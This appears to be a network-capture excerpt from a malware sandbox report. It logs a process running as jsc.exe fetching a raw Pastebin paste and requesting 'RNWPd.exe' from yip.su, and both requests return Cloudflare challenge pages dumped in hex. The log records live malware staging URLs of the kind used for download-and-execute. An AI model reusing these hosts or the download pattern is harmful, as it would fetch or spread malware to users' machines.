                                    2024-08-17 22:08:11 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:11 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:11 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:11 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:11 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:11 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 33 38 31 36 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 33 39 36 61 34 64 34 33 66 38 27 2c 63 48 61 73 68 3a 20 27 64 31 33 33 33 39 66 61 62 38 66 64 34 61 38 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 76 68 2e 4b 65 32 36 54 59 59 71 72 39 5f 37 68 54 55 49 53 62 4e 63 4d 62 37 69 5a 59 78 68 79 5a 4a 42 5f 7a 31 76 32 4e 59 45 2d 31 37 32 33 39 33 32 34 39 31 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '93816',cRay: '8b4cfb396a4d43f8',cHash: 'd13339fab8fd4a8',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=vh.Ke26TYYqr9_7hTUISbNcMb7iZYxhyZJB_z1v2NYE-1723932491-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:11 UTC1369INData Raw: 48 33 6c 5f 4f 59 31 70 33 72 32 7a 34 62 6b 6e 4b 5a 37 68 77 4e 79 67 5f 73 50 42 58 75 41 53 51 37 71 73 32 75 38 7a 5f 7a 4f 51 39 62 6f 4b 46 2e 65 70 77 45 57 47 59 5f 71 4c 4b 58 43 55 31 46 42 34 45 5f 66 36 5f 52 55 6e 39 57 41 38 44 74 5f 77 31 44 64 7a 67 6f 68 54 76 42 67 4d 35 4e 75 36 4e 48 37 45 67 6a 54 67 6c 79 57 64 50 45 73 67 69 5f 51 31 6a 6e 57 74 43 36 4e 58 44 56 79 46 61 37 4d 34 54 77 41 39 75 39 78 30 5f 6f 37 66 4b 4a 53 42 79 53 77 51 44 6a 61 46 70 77 4a 30 62 53 52 49 39 31 4d 63 75 4b 74 56 55 34 31 55 65 44 68 62 6e 76 32 6b 51 47 78 6f 68 75 51 6d 4f 6a 59 5f 53 51 70 41 70 75 44 6b 43 59 36 4a 4a 57 5a 55 48 66 62 76 4e 47 5a 4c 39 54 6b 6a 5a 37 62 73 62 73 45 6d 68 42 7a 5f 76 54 61 30 2e 6d 36 5a 79 39 76 37 75 70 6f
                                    Data Ascii: H3l_OY1p3r2z4bknKZ7hwNyg_sPBXuASQ7qs2u8z_zOQ9boKF.epwEWGY_qLKXCU1FB4E_f6_RUn9WA8Dt_w1DdzgohTvBgM5Nu6NH7EgjTglyWdPEsgi_Q1jnWtC6NXDVyFa7M4TwA9u9x0_o7fKJSBySwQDjaFpwJ0bSRI91McuKtVU41UeDhbnv2kQGxohuQmOjY_SQpApuDkCY6JJWZUHfbvNGZL9TkjZ7bsbsEmhBz_vTa0.m6Zy9v7upo


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.549721104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:16 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:16 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:16 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfb597dcd43a7-EWR
                                    2024-08-17 22:08:16 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:16 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:16 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:16 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.549723188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:17 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:17 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:17 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 45 38 39 38 50 6e 58 59 52 6a 37 58 54 6e 62 42 6e 50 37 55 6f 42 37 5a 6d 59 69 53 2f 37 53 6a 50 38 69 43 72 7a 55 66 6a 64 49 30 6c 76 61 75 75 2b 53 41 36 72 4f 34 76 74 52 79 6d 65 2b 71 48 6d 39 6a 4b 62 76 56 73 32 32 63 50 42 4b 6a 79 58 6d 6d 71 75 34 39 4a 45 50 63 6b 47 72 2f 49 2f 55 61 43 42 32 70 6d 50 30 3d 24 6c 46 6f 59 56 2f 66 74 41 2f 57 70 54 6a 79 6a 62 71 44 6c 50 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: E898PnXYRj7XTnbBnP7UoB7ZmYiS/7SjP8iCrzUfjdI0lvauu+SA6rO4vtRyme+qHm9jKbvVs22cPBKjyXmmqu49JEPckGr/I/UaCB2pmP0=$lFoYV/ftA/WpTjyjbqDlPw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:17 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:17 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:17 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:17 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:17 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
